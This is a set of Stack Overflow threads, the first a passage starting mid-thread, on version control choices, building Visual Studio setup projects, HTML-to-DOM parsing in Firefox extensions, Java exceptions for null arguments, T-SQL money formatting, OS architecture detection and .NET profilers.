Start with SVN and learn the basics, then graduate to a DVCS.
A: Version Control is essential to development, even if you're working by yourself because it protects you from yourself. If you make a mistake, it's a simple matter to rollback to a previous version of your code that you know works. This also frees you to explore and experiment with your code because you're free of having to worry about whether what you're doing is reversible or not. There are two major branches of Version Control Systems (VCS), Centralized and Distributed.
Centralized VCS are based on using a central server, where everyone "checks out" a project, works on it, and "commits" their changes back to the server for anybody else to use. The major Centralized VCS are CVS and SVN. Both have been heavily criticized because "merging" "branches" is extremely painful with them. [TODO: write explanation on what branches are and why merging is hard with CVS & SVN]
Distributed VCS let everyone have their own server, where you can "pull" changes from other people and "push" changes to a server. The most common Distributed VCS are Git and Mercurial. [TODO: write more on Distributed VCS]
If you're working on a project I heavily recommend using a distributed VCS. I recommend Git because it's blazingly fast, but is has been criticized as being too hard to use. If you don't mind using a commercial product BitKeeper is supposedly easy to use.
A: I would start with:
*
*A Visual Guide to Version Control
*Wikipedia
Then once you have read up on it, download and install SVN, TortoiseSVN and skim the first few chapters of the book and get started.
A: The answer to another question also applies here, most importantly
Jon Works said:
The most important thing about version control is:
JUST START USING IT
His answer goes into more detail, and I don't want to be accused of plaigerism so take a look.
A: We seem to be in the golden age of version control, with a ton of choices, all of which have their pros and cons.
Here are the ones I see most used:
*
*svn - currently the most popular open source?
*git - very hot since Linus switched to it
*mercurial - some smart people I know swear by it
*cvs - the one everybody is switching from
*perforce - imho, the best features, but it's not open source. The two-user license is free, though.
*visual sourcesafe - I'm not much in the Microsoft world, so I have no idea about this one, other than people like to rag on it as they rag on everything from Microsoft.
*sccs - for historical interest we mention this, the great-grandaddy of many of the above
*rcs - and the grandaddy of many of the above
My recommendation: you're safest with either git, svn or perforce, since a lot of people use them, they are cross platform, have good guis, you can buy books about them, etc.
Dont consider cvs, sccs, rcs, they are antique.
The nice thing is that, since your projects will be relatively small, you will be able to move your code to a new system once you're more experienced and decide you want to work with another system.
A: The simple answer is, do you like Undo buttons? The answer is of course yes, because we as human being make mistakes all the time.
As programmers, its often the case though that it can take several hours of testing, code changes, overwrites, deletions, file moves and renames before we work out the method we are trying to use to fix a problem is entirely the wrong one and the code is more broken than when we started.
As such, Source Control is a massive Undo button to revert the code to an earlier time when the grass was green and the food plentiful. And not only that, because of how source control works, you can still keep a copy of your broken code, in case a few weeks down the line you want to refer to it again and cherry pick any good ideas that did come out of it.
I personally (though it could be called overkill) use a free Single user license version of Source Gear Fortress (which is their Vault source control product with bug tracking features). I find the UI really simple to use, it supports both the checkout > edit > checkin model and the edit > merge > commit model. It can be a little tricky to set up though, requiring you to run a local copy of ISS and SQL server. You might want to try a smaller program, like those recommended by other answers here. See what you like and what you can afford.
A: Mark said:
git - very hot since Linus switched to it
I just want to point out that Linus didn't switch to it, Linus wrote it.
A: Eric Sink has a good overview of source control. There are also some existing questions here on SO.
A: If you are working by yourself in a Windows environment, then the single user license for SourceGear's Vault is free.
A: We use and like Mercurial. It follows a distributed model - it eliminates some of the sense of having to "check in" work. Mozilla has moved to Mercurial, which is a good sign that it's not going to go away any time soon. One con, in my opinion, is that there isn't a very good GUI for it. If you're comfortable with the command line, though, it's pretty handy.
Mercurial Documentation
Unofficial Manual
A: Just start using source control, no matter what type you use. What you use doesn't matter; it's the use of it that is important
A: Like everyone else, SC is really dependant on your needs, your budget, your environment, etc.
At its root, source control is designed to provide a central repository of all your code, and track who did what to it when. There should be a complete history, and you can get products that do full changelogs, auditing, access control, and on and on...
Each product that is out there starts to shine (so to speak) when you start to look at how you want or need to incorporate SC into your environment (whether it's your personal code and documents or a large corporations). And as people use them, they discover that the tool has limitations, so people write new ones. SVN was born out of limitations that the creators saw with CVS. Linus wanted something better for the Linux kernel, so now we have git.
I would say start using one (something like SVN which is very popular and pretty easy to use) and see how it goes. As time progresses you may find that you need some other functionality, or need to interface with other systems, so you may need SourceSafe or another tool.
Source control is always important, and while you can get away with manually re-numbering versions of PSD files or something as you work on them, you're going to forget to run that batch script once or twice, or likely forget which number went with which change. That's where most of these SC tools can help (as long as you check-in/check-out).
A: See also this SO question:
*
*Difference between GIT and CVS
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3859",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: Automated release script and Visual Studio Setup projects I think most people here understand the importance of fully automated builds.
The problem is one of our project is now using an integrated Visual Studio Setup project (vdproj) and has recently been ported to Visual Studio 2008. Unfortunatly, those won't build in MSBuild and calling devenv.exe /build on 2008 just crashes, apparently it does that on all multi core computer (!!!). So now I have the choice to either rollback to .Net 2.0 and 2005 or simply ditch Visual Studio deployement, but first, I'd like a second opinion.
Anyone knows of another automated way to build a .vdproj that will not require us to open the IDE and click on stuff?
WiX was what I had in mind when saying we would ditch vdproj. Do you have any experience with it, good things, caveat?
A: The low cost solution is to switch to using ClickOnce, which you can automate using MSBuild. But if you still need to create a Windows Installer package, you will need to convert your project to WiX (pretty straight foward) and build that with your solution.
This will get you started:
Automate Releases With MSBuild And Windows Installer XML
A: I've used WiX a little bit before, and generally I found that it's great once you figure out what to do but there is a steep learning curve. If you spend a solid day going over the WiX tutorial you should be be able to get 80% of your setup working.
WiX Toolset Tutorial
A: I had the same requirement and ended up using what is suggested in these two links
David Williams Blog
MSDN article
Basically, since Team Build, by itself, will not build the setup projects for you, this approach has you add a new build step after the regular build is complete. This step fires off a second build by launching the devenv.exe. The IDE will build your setup files. The extra build is a bit costly but we only needed it for builds that were going to be pushed out. The Daily build at most would need this customization our CI build does not need to build setup files each time.
After that you execute some Copy commands, once again build steps that show up in your Team System build results, to move the setup files to a network share etc.
It feels a bit like a kluge at first, but it does work, it is also a full-fledged part of the automated build in Team System so it worked for my Continuous Integration goals.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3867",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: How can I turn a string of HTML into a DOM object in a Firefox extension? I'm downloading a web page (tag soup HTML) with XMLHttpRequest and I want to take the output and turn it into a DOM object that I can then run XPATH queries on. How do I convert from a string into DOM object?
It appears that the general solution is to create a hidden iframe and throw the contents of the string into that. There has been talk of updating DOMParser to support text/html but as of Firefox 3.0.1 you still get an NS_ERROR_NOT_IMPLEMENTED if you try.
Is there any option besides using the hidden iframe trick? And if not, what is the best way to do the iframe trick so that your code works outside the context of any currently open tabs (so that closing tabs won't screw up the code, etc)?
This is an example of why I'm looking for a solution other than the iframe hack, if I have to write all that code to have a robust solution, then I'd rather keep looking for something else.
A: Try this:
var request = new XMLHttpRequest();
request.overrideMimeType( 'text/xml' );
request.onreadystatechange = process;
request.open ( 'GET', url );
request.send( null );
function process() {
if ( request.readyState == 4 && request.status == 200 ) {
var xml = request.responseXML;
}
}
Notice the overrideMimeType and responseXML. The readyState == 4 is 'completed'.
A: Try creating a div
document.createElement( 'div' );
And then set the tag soup HTML to the innerHTML of the div. The browser should process that into XML, which then you can parse.
The innerHTML property takes a string
that specifies a valid combination of
text and elements. When the innerHTML
property is set, the given string
completely replaces the existing
content of the object. If the string
contains HTML tags, the string is
parsed and formatted as it is placed
into the document.
A: Ajaxian actually had a post on inserting / retrieving html from an iframe today. You can probably use the js snippet they have posted there.
As for handling closing of a browser / tab, you can attach to the onbeforeunload (http://msdn.microsoft.com/en-us/library/ms536907(VS.85).aspx) event and do whatever you need to do.
A: So you want to download a webpage as an XML object using javascript, but you don't want to use a webpage? Since you have no control over what the user will do (closing tabs or windows or whatnot) you would need to do this in like a OSX Dashboard widget or some separate application. A Firefox extension would also work, unless you have to worry about the user closing the browser.
A:
Is there any option besides using the hidden iframe trick?
Unfortunately, no, not now. Otherwise the microsummary code you point to would use it instead.
And if not, what is the best way to do the iframe trick so that your code works outside the context of any currently open tabs (so that closing tabs won't screw up code, etc)?
The code you quoted uses the recent browser window, so closing tabs won't affect parsing. Closing that browser window will abort your load, but you can deal with it (detect that the load is aborted and restart it in another window for example) and it doesn't happen very often.
You need a DOM window for the iframe to work properly, so there's no clean solution at the moment (if you're keen on using the mozilla parser).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3868",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "26"
} |
Q: IllegalArgumentException or NullPointerException for a null parameter? I have a simple setter method for a property and null is not appropriate for this particular property. I have always been torn in this situation: should I throw an IllegalArgumentException, or a NullPointerException? From the javadocs, both seem appropriate. Is there some kind of an understood standard? Or is this just one of those things that you should do whatever you prefer and both are really correct?
A: As a subjective question this should be closed, but as it's still open:
This is part of the internal policy used at my previous place of employment and it worked really well. This is all from memory so I can't remember the exact wording. It's worth noting that they did not use checked exceptions, but that is beyond the scope of the question. The unchecked exceptions they did use fell into 3 main categories.
NullPointerException: Do not throw intentionally. NPEs are to be thrown only by the VM when dereferencing a null reference. All possible effort is to be made to ensure that these are never thrown. @Nullable and @NotNull should be used in conjunction with code analysis tools to find these errors.
IllegalArgumentException: Thrown when an argument to a function does not conform to the public documentation, such that the error can be identified and described in terms of the arguments passed in. The OP's situation would fall into this category.
IllegalStateException: Thrown when a function is called and its arguments are either unexpected at the time they are passed or incompatible with the state of the object the method is a member of.
For example, there were two internal versions of the IndexOutOfBoundsException used in things that had a length. One a sub-class of IllegalStateException, used if the index was larger than the length. The other a subclass of IllegalArgumentException, used if the index was negative. This was because you could add more items to the object and the argument would be valid, while a negative number is never valid.
As I said, this system works really well, and it took someone to explain why the distinction is there: "Depending on the type of error it is quite straightforward for you to figure out what to do. Even if you can't actually figure out what went wrong you can figure out where to catch that error and create additional debugging information."
NullPointerException: Handle the Null case or put in an assertion so that the NPE is not thrown. If you put in an assertion is just one of the other two types. If possible, continue debugging as if the assertion was there in the first place.
IllegalArgumentException: you have something wrong at your call site. If the values being passed in are from another function, find out why you are receiving an incorrect value. If you are passing in one of your arguments propagate the error checks up the call stack until you find the function that is not returning what you expect.
IllegalStateException: You have not called your functions in the correct order. If you are using one of your arguments, check them and throw an IllegalArgumentException describing the issue. You can then propagate the cheeks up against the stack until you find the issue.
Anyway, his point was that you can only copy the IllegalArgumentAssertions up the stack. There is no way for you to propagate the IllegalStateExceptions or NullPointerExceptions up the stack because they had something to do with your function.
A: I tend to follow the design of JDK libraries, especially Collections and Concurrency (Joshua Bloch, Doug Lea, those guys know how to design solid APIs). Anyway, many APIs in the JDK pro-actively throws NullPointerException.
For example, the Javadoc for Map.containsKey states:
@throws NullPointerException if the key is null and this map
does not permit null keys (optional).
It's perfectly valid to throw your own NPE. The convention is to include the parameter name which was null in the message of the exception.
The pattern goes:
public void someMethod(Object mustNotBeNull) {
if (mustNotBeNull == null) {
throw new NullPointerException("mustNotBeNull must not be null");
}
}
Whatever you do, don't allow a bad value to get set and throw an exception later when other code attempts to use it. That makes debugging a nightmare. You should always the follow the "fail-fast" principle.
A: Couldn't agree more with what's being said. Fail early, fail fast. Pretty good Exception mantra.
The question about which Exception to throw is mostly a matter of personal taste. In my mind IllegalArgumentException seems more specific than using a NPE since it's telling me that the problem was with an argument I passed to the method and not with a value that may have been generated while performing the method.
My 2 Cents
A: Actually, the question of throwing IllegalArgumentException or NullPointerException is in my humble view only a "holy war" for a minority with an incomlete understanding of exception handling in Java. In general, the rules are simple, and as follows:
*
*argument constraint violations must be indicated as fast as possible (-> fast fail), in order to avoid illegal states which are much harder to debug
*in case of an invalid null pointer for whatever reason, throw NullPointerException
*in case of an illegal array/collection index, throw ArrayIndexOutOfBounds
*in case of a negative array/collection size, throw NegativeArraySizeException
*in case of an illegal argument that is not covered by the above, and for which you don't have another more specific exception type, throw IllegalArgumentException as a wastebasket
*on the other hand, in case of a constraint violation WITHIN A FIELD that could not be avoided by fast fail for some valid reason, catch and rethrow as IllegalStateException or a more specific checked exception. Never let pass the original NullPointerException, ArrayIndexOutOfBounds, etc in this case!
There are at least three very good reasons against the case of mapping all kinds of argument constraint violations to IllegalArgumentException, with the third probably being so severe as to mark the practice bad style:
(1) A programmer cannot a safely assume that all cases of argument constraint violations result in IllegalArgumentException, because the large majority of standard classes use this exception rather as a wastebasket if there is no more specific kind of exception available. Trying to map all cases of argument constraint violations to IllegalArgumentException in your API only leads to programmer frustration using your classes, as the standard libraries mostly follow different rules that violate yours, and most of your API users will use them as well!
(2) Mapping the exceptions actually results in a different kind of anomaly, caused by single inheritance: All Java exceptions are classes, and therefore support single inheritance only. Therefore, there is no way to create an exception that is truly say both a NullPointerException and an IllegalArgumentException, as subclasses can only inherit from one or the other. Throwing an IllegalArgumentException in case of a null argument therefore makes it harder for API users to distinguish between problems whenever a program tries to programmatically correct the problem, for example by feeding default values into a call repeat!
(3) Mapping actually creates the danger of bug masking: In order to map argument constraint violations into IllegalArgumentException, you'll need to code an outer try-catch within every method that has any constrained arguments. However, simply catching RuntimeException in this catch block is out of the question, because that risks mapping documented RuntimeExceptions thrown by libery methods used within yours into IllegalArgumentException, even if they are no caused by argument constraint violations. So you need to be very specific, but even that effort doesn't protect you from the case that you accidentally map an undocumented runtime exception of another API (i.e. a bug) into an IllegalArgumentException of your API. Even the most careful mapping therefore risks masking programming errors of other library makers as argument constraint violations of your method's users, which is simply hillareous behavior!
With the standard practice on the other hand, the rules stay simple, and exception causes stay unmasked and specific. For the method caller, the rules are easy as well:
- if you encounter a documented runtime exception of any kind because you passed an illegal value, either repeat the call with a default (for this specific exceptions are neccessary), or correct your code
- if on the other hand you enccounter a runtime exception that is not documented to happen for a given set of arguments, file a bug report to the method's makers to ensure that either their code or their documentation is fixed.
A: The accepted practice if to use the IllegalArgumentException( String message ) to declare a parameter to be invalid and give as much detail as possible... So to say that a parameters was found to be null while exception non-null, you would do something like this:
if( variable == null )
throw new IllegalArgumentException("The object 'variable' cannot be null");
You have virtually no reason to implicitly use the "NullPointerException". The NullPointerException is an exception thrown by the Java Virtual Machine when you try to execute code on null reference (Like toString()).
A: Throwing an exception that's exclusive to null arguments (whether NullPointerException or a custom type) makes automated null testing more reliable. This automated testing can be done with reflection and a set of default values, as in Guava's NullPointerTester. For example, NullPointerTester would attempt to call the following method...
Foo(String string, List<?> list) {
checkArgument(string.length() > 0);
// missing null check for list!
this.string = string;
this.list = list;
}
...with two lists of arguments: "", null and null, ImmutableList.of(). It would test that each of these calls throws the expected NullPointerException. For this implementation, passing a null list does not produce NullPointerException. It does, however, happen to produce an IllegalArgumentException because NullPointerTester happens to use a default string of "". If NullPointerTester expects only NullPointerException for null values, it catches the bug. If it expects IllegalArgumentException, it misses it.
A: In general, a developer should never throw a NullPointerException. This exception is thrown by the runtime when code attempts to dereference a variable who's value is null. Therefore, if your method wants to explicitly disallow null, as opposed to just happening to have a null value raise a NullPointerException, you should throw an IllegalArgumentException.
A: Some collections assume that null is rejected using NullPointerException rather than IllegalArgumentException. For example, if you compare a set containing null to a set that rejects null, the first set will call containsAll on the other and catch its NullPointerException -- but not IllegalArgumentException. (I'm looking at the implementation of AbstractSet.equals.)
You could reasonably argue that using unchecked exceptions in this way is an antipattern, that comparing collections that contain null to collections that can't contain null is a likely bug that really should produce an exception, or that putting null in a collection at all is a bad idea. Nevertheless, unless you're willing to say that equals should throw an exception in such a case, you're stuck remembering that NullPointerException is required in certain circumstances but not in others. ("IAE before NPE except after 'c'...")
Somewhat similarly, build tools may insert null checks automatically. Notably, Kotlin's compiler does this when passing a possibly null value to a Java API. And when a check fails, the result is a NullPointerException. So, to give consistent behavior to any Kotlin users and Java users that you have, you'd need to use NullPointerException.
A: Voted up Jason Cohen's argument because it was well presented. Let me dismember it step by step. ;-)
*
*The NPE JavaDoc explicitly says, "other illegal uses of the null object". If it was just limited to situations where the runtime encounters a null when it shouldn't, all such cases could be defined far more succinctly.
*Can't help it if you assume the wrong thing, but assuming encapsulation is applied properly, you really shouldn't care or notice whether a null was dereferenced inappropriately vs. whether a method detected an inappropriate null and fired an exception off.
*I'd choose NPE over IAE for multiple reasons
*
*It is more specific about the nature of the illegal operation
*Logic that mistakenly allows nulls tends to be very different from logic that mistakenly allows illegal values. For example, if I'm validating data entered by a user, if I get value that is unacceptable, the source of that error is with the end user of the application. If I get a null, that's programmer error.
*Invalid values can cause things like stack overflows, out of memory errors, parsing exceptions, etc. Indeed, most errors generally present, at some point, as an invalid value in some method call. For this reason I see IAE as actually the MOST GENERAL of all exceptions under RuntimeException.
*Actually, other invalid arguments can result in all kinds of other exceptions. UnknownHostException, FileNotFoundException, a variety of syntax error exceptions, IndexOutOfBoundsException, authentication failures, etc., etc.
In general, I feel NPE is much maligned because traditionally has been associated with code that fails to follow the fail fast principle. That, plus the JDK's failure to populate NPE's with a message string really has created a strong negative sentiment that isn't well founded. Indeed, the difference between NPE and IAE from a runtime perspective is strictly the name. From that perspective, the more precise you are with the name, the more clarity you give to the caller.
A: You should be using IllegalArgumentException (IAE), not NullPointerException (NPE) for the following reasons:
First, the NPE JavaDoc explicitly lists the cases where NPE is appropriate. Notice that all of them are thrown by the runtime when null is used inappropriately. In contrast, the IAE JavaDoc couldn't be more clear: "Thrown to indicate that a method has been passed an illegal or inappropriate argument." Yup, that's you!
Second, when you see an NPE in a stack trace, what do you assume? Probably that someone dereferenced a null. When you see IAE, you assume the caller of the method at the top of the stack passed in an illegal value. Again, the latter assumption is true, the former is misleading.
Third, since IAE is clearly designed for validating parameters, you have to assume it as the default choice of exception, so why would you choose NPE instead? Certainly not for different behavior -- do you really expect calling code to catch NPE's separately from IAE and do something different as a result? Are you trying to communicate a more specific error message? But you can do that in the exception message text anyway, as you should for all other incorrect parameters.
Fourth, all other incorrect parameter data will be IAE, so why not be consistent? Why is it that an illegal null is so special that it deserves a separate exception from all other types of illegal arguments?
Finally, I accept the argument given by other answers that parts of the Java API use NPE in this manner. However, the Java API is inconsistent with everything from exception types to naming conventions, so I think just blindly copying (your favorite part of) the Java API isn't a good enough argument to trump these other considerations.
A: I wanted to single out Null arguments from other illegal arguments, so I derived an exception from IAE named NullArgumentException. Without even needing to read the exception message, I know that a null argument was passed into a method and by reading the message, I find out which argument was null. I still catch the NullArgumentException with an IAE handler, but in my logs is where I can see the difference quickly.
A: the dichotomy... Are they non-overlapping? Only non-overlapping parts of a whole can make a dichotomy. As i see it:
throw new IllegalArgumentException(new NullPointerException(NULL_ARGUMENT_IN_METHOD_BAD_BOY_BAD));
A: According to your scenario, IllegalArgumentException is the best pick, because null is not a valid value for your property.
A: NullPointerException thrown when attempting to access an object with a reference variable whose current value is null.
IllegalArgumentException thrown when a method receives an argument formatted differently than the method expects.
A: It seems like an IllegalArgumentException is called for if you don't want null to be an allowed value, and the NullPointerException would be thrown if you were trying to use a variable that turns out to be null.
A: It's a "Holy War" style question. In others words, both alternatives are good, but people will have their preferences which they will defend to the death.
A: If it's a setter method and null is being passed to it, I think it would make more sense to throw an IllegalArgumentException. A NullPointerException seems to make more sense in the case where you're attempting to actually use the null.
So, if you're using it and it's null, NullPointer. If it's being passed in and it's null, IllegalArgument.
A: The standard is to throw the NullPointerException. The generally infallible "Effective Java" discusses this briefly in Item 42 (first edition), Item 60 (second edition), or Item 72 (third edition) "Favor the use of standard exceptions":
"Arguably, all erroneous method
invocations boil down to an illegal
argument or illegal state, but other
exceptions are standardly used for
certain kinds of illegal arguments and
states. If a caller passes null in
some parameter for which null values
are prohibited, convention dictates
that NullPointerException be thrown
rather than IllegalArgumentException."
A: I was all in favour of throwing IllegalArgumentException for null parameters, until today, when I noticed the java.util.Objects.requireNonNull method in Java 7. With that method, instead of doing:
if (param == null) {
throw new IllegalArgumentException("param cannot be null.");
}
you can do:
Objects.requireNonNull(param);
and it will throw a NullPointerException if the parameter you pass it is null.
Given that that method is right bang in the middle of java.util I take its existence to be a pretty strong indication that throwing NullPointerException is "the Java way of doing things".
I think I'm decided at any rate.
Note that the arguments about hard debugging are bogus because you can of course provide a message to NullPointerException saying what was null and why it shouldn't be null. Just like with IllegalArgumentException.
One added advantage of NullPointerException is that, in highly performance critical code, you could dispense with an explicit check for null (and a NullPointerException with a friendly error message), and just rely on the NullPointerException you'll get automatically when you call a method on the null parameter. Provided you call a method quickly (i.e. fail fast), then you have essentially the same effect, just not quite as user friendly for the developer. Most times it's probably better to check explicitly and throw with a useful message to indicate which parameter was null, but it's nice to have the option of changing that if performance dictates without breaking the published contract of the method/constructor.
A: Apache Commons Lang has a NullArgumentException that does a number of the things discussed here: it extends IllegalArgumentException and its sole constructor takes the name of the argument which should have been non-null.
While I feel that throwing something like a NullArgumentException or IllegalArgumentException more accurately describes the exceptional circumstances, my colleagues and I have chosen to defer to Bloch's advice on the subject.
A: If you choose to throw a NPE and you are using the argument in your method, it might be redundant and expensive to explicitly check for a null. I think the VM already does that for you.
A: The definitions from the links to the two exceptions above are
IllegalArgumentException: Thrown to indicate that a method has been passed an illegal or inappropriate argument.
NullPointerException: Thrown when an application attempts to use null in a case where an object is required.
The big difference here is the IllegalArgumentException is supposed to be used when checking that an argument to a method is valid. NullPointerException is supposed to be used whenever an object being "used" when it is null.
I hope that helps put the two in perspective.
A: If it's a "setter", or somewhere I'm getting a member to use later, I tend to use IllegalArgumentException.
If it's something I'm going to use (dereference) right now in the method, I throw a NullPointerException proactively. I like this better than letting the runtime do it, because I can provide a helpful message (seems like the runtime could do this too, but that's a rant for another day).
If I'm overriding a method, I use whatever the overridden method uses.
A: You should throw an IllegalArgumentException, as it will make it obvious to the programmer that he has done something invalid. Developers are so used to seeing NPE thrown by the VM, that any programmer would not immediately realize his error, and would start looking around randomly, or worse, blame your code for being 'buggy'.
A: In this case, IllegalArgumentException conveys clear information to the user using your API that the " should not be null". As other forum users pointed out you could use NPE if you want to as long as you convey the right information to the user using your API.
GaryF and tweakt dropped "Effective Java" (which I swear by) references which recommends using NPE. And looking at how other good APIs are constructed is the best way to see how to construct your API.
Another good example is to look at the Spring APIs. For example, org.springframework.beans.BeanUtils.instantiateClass(Constructor ctor, Object[] args) has a Assert.notNull(ctor, "Constructor must not be null") line. org.springframework.util.Assert.notNull(Object object, String message) method checks to see if the argument (object) passed in is null and if it is it throws a new IllegalArgumentException(message) which is then caught in the org.springframework.beans.BeanUtils.instantiateClass(...) method.
A: Ideally runtime exceptions should not be thrown. A checked exception(business exception) should be created for your scenario. Because if either of these exception is thrown and logged, it misguides the developer while going through the logs. Instead business exceptions do not create that panic and usually ignored while troubleshooting logs.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3881",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "568"
} |
Q: T-Sql Remove Decimal Point From Money Data Type Given the constraint of only using T-Sql in Sql Server 2005, is there a better way to remove the decimal point from a money datatype than a conversion to a varchar (here implicitly) and then a replace of the decimal point?
Here is what I have currently.
SELECT REPLACE(1.23, '.', ''), REPLACE(19.99, '.', '')
Which returns the desired 123 and 1999, but I was wondering if there was a better way. Any thoughts?
A: Multiply by 100 and then convert to an int.
A: You should never ever use the money datatype to store monetary values. If you do any calculations you will get truncated results. Run the following to see what I mean
DECLARE
@mon1 MONEY,
@mon2 MONEY,
@mon3 MONEY,
@mon4 MONEY,
@num1 DECIMAL(19,4),
@num2 DECIMAL(19,4),
@num3 DECIMAL(19,4),
@num4 DECIMAL(19,4)
SELECT
@mon1 = 100, @mon2 = 339, @mon3 = 10000,
@num1 = 100, @num2 = 339, @num3 = 10000
SET @mon4 = @mon1/@mon2*@mon3
SET @num4 = @num1/@num2*@num3
SELECT @mon4 AS moneyresult,
@num4 AS numericresult
Output:
2949.0000 2949.8525
A: Could you be a little more specific about the use case? Removing the decimal point from the representation is a little unusual given that you'll lose all information about the scale. Are you assuming that there will always be two digits? If so, you could simplify multiply by 100 and then round before converting to a string.
A: Keep in mind that the money data type can have up to 4 digits past the decimal. Values with more than two digits might not work as expected for either your original solution or the x100 trick.
A: Here is the magic:
DataFormatString="{0:c0}
This will remove the decimal places.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3894",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: Is this a good way to determine OS Architecture? Since the WMI class Win32_OperatingSystem only includes OSArchitecture in Windows Vista, I quickly wrote up a method using the registry to try and determine whether or not the current system is a 32 or 64bit system.
private Boolean is64BitOperatingSystem()
{
RegistryKey localEnvironment = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment");
String processorArchitecture = (String) localEnvironment.GetValue("PROCESSOR_ARCHITECTURE");
if (processorArchitecture.Equals("x86")) {
return false;
}
else {
return true;
}
}
It's worked out pretty well for us so far, but I'm not sure how much I like looking through the registry. Is this a pretty standard practice or is there a better method?
Edit: Wow, that code looks a lot prettier in the preview. I'll consider linking to a pastebin or something, next time.
A: Take a look at Raymond Chens solution:
How to detect programmatically whether you are running on 64-bit Windows
and here's the PINVOKE for .NET:
IsWow64Process (kernel32)
Update: I'd take issue with checking for 'x86'. Who's to say what intel's or AMD's next 32 bit processor may be designated as. The probability is low but it is a risk. You should ask the OS to determine this via the correct API's, not by querying what could be a OS version/platform specific value that may be considered opaque to the outside world. Ask yourself the questions, 1 - is the registry entry concerned properly documented by MS, 2 - If it is do they provide a definitive list of possible values that is guaranteed to permit you as a developer to make the informed decision between whether you are running 32 bit or 64 bit. If the answer is no, then call the API's, yeah it's a but more long winded but it is documented and definitive.
A:
The easiest way to test for 64-bit under .NET is to check the value of IntPtr.Size.
I believe the value of IntPtr.Size is 4 for a 32bit app that's running under WOW, isn't it?
Edit: @Edit: Yeah. :)
A: Looking into the registry is perfectly valid, so long as you can be sure that the user of the application will always have access to what you need.
A: The easiest way to test for 64-bit under .NET is to check the value of IntPtr.Size.
EDIT: Doh! This will tell you whether or not the current process is 64-bit, not the OS as a whole. Sorry!
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3903",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: What Are Some Good .NET Profilers? What profilers have you used when working with .net programs, and which would you particularly recommend?
A: I've been working with JetBrains dotTrace for WinForms and Console Apps (not tested on ASP.net yet), and it works quite well:
They recently also added a "Personal License" that is significantly cheaper than the corporate one. Still, if anyone else knows some cheaper or even free ones, I'd like to hear as well :-)
A: Others have covered performance profiling, but with regards to memory profiling
I'm currently evaluating both the Scitech .NET Memory Profiler 3.1 and ANTS Memory Profiler 5.1 (current versions as of September 2009). I tried the JetBrains one a year or two ago and it wasn't as good as ANTS (for memory profiling) so I haven't bothered this time. From reading the web sites it looks like it doesn't have the same memory profiling features as the other two.
Both ANTS and the Scitech memory profiler have features that the other doesn't, so which is best will depend upon your preferences. Generally speaking, the Scitech one provides more detailed information while the ANTS one is really incredible at identifying the leaking object. Overall, I prefer the ANTS one because it is so quick at identifying possible leaks.
Here are the main the pros and cons of each from my experience:
Common Features of ANTS and Scitech .NET Memory Profiler
*
*Real-time analysis feature
*Excellent how-to videos on their web sites
*Easy to use
*Reasonably performant (obviously slower than without the profiler attached, but not so much you become frustrated)
*Show instances of leaking objects
*Basically they both do the job pretty well
ANTS
*
*One-click filters to find common leaks including: objects kept alive only by event handlers, objects that are disposed but still live and objects that are only being kept alive by a reference from a disposed object. This is probably the killer feature of ANTS - finding leaks is incredibly fast because of this. In my experience, the majority of leaks are caused by event handlers not being unhooked and ANTS just takes you straight to these objects. Awesome.
*Object retention graph. While the same info is available in Scitech, it's much easier to interpret in ANTS.
*Shows size with children in addition to size of the object itself (but only when an instance is selected unfortunately, not in the overall class list).
*Better integration to Visual Studio (right-click on graph to jump to file)
Scitech .NET Memory Profiler
*
*Shows stack trace when object was allocated. This is really useful for objects that are allocated in lots of different places. With ANTS it is difficult to determine exactly where the leaked object was created.
*Shows count of disposable objects that were not disposed. While not indicative of a leak, it does identify opportunities to fix this problem and improve your application performance as a result of faster garbage collection.
*More detailed filtering options (several columns can be filtered independently).
*Presents info on total objects created (including those garbage collected). ANTS only shows 'live' object stats. This makes it easier to analyze and tune overall application performance (eg. identify where lots of objects being created unnecessarily that aren't necessarily leaking).
By way of summary, I think ANTS helps you find what's leaking faster while Scitech provides a bit more detail about your overall application memory performance and individual objects once you know what to look at (eg. stack trace on creation). If the stack trace and tracking of undisposed disposable objects was added to ANTS I wouldn't see the need to use anything else.
A: Don't forget the awesome scitech .net memory profiler
It's great for tracking down why your .net app is running out of memory.
A: I would add that dotTrace's ability to diff memory and performance trace sessions is absolutely invaluable (ANTS may also have a memory diff feature, but I didn't see a performance diff).
Being able to run a profiling session before and after a bug fix or enhancement, then compare the results is incredibly valuable, especially with a mammoth legacy .NET application (as in my case) where performance was never a priority and where finding bottlenecks could be VERY tedious. Doing a before-and-after diff allows you to see the change in call count for each method and the change in duration for each method.
This is helpful not only during code changes, but also if you have an application that uses a different database, say, for each client/customer. If one customer complains of slowness, you can run a profiling session using their database and compare the results with a "fast" database to determine which operations are contributing to the slowness. Of course there are many database-side performance tools, but sometimes I really helps to see the performance metrics from the application side (since that's closer to what the user's actually seeing).
Bottom line: dotTrace works great, and the diff is invaluable.
A: I recently discovered EQATEC Profiler http://www.eqatec.com/tools/profiler. It works with most .NET versions and on a bunch of platforms. It is easy to use and parts of it is free, even for commercial use.
A: AQTime is reasonable, but has a bit of a learning curve and isn't as easy to use as the built in one in Team Suite
A: [Full Disclosure]
While not yet as full-featured as some of the other .NET memory profilers listed here, there is a new entry on the market called JustTrace. It's made by Telerik and it's primary goal is to make tracing/profiling easier and faster to do for all types of apps (web/Silverlight/desktop).
If you've ever found profiling and optimization intimidating or slow with other tools, then JustTrace might be worth a look.
A: In the past, I’ve used the profiler that ships with Visual Studio Team System.
A: The current release of SharpDevelop (3.1.1) has a nice integrated profiler. It's quite fast, and integrates very well into the SharpDevelop IDE and its NUnit runner. Results are displayed in a flexible Tree/List style (use LINQ to create your own selection). Doubleclicking the displayed method jumps directly into the source code.
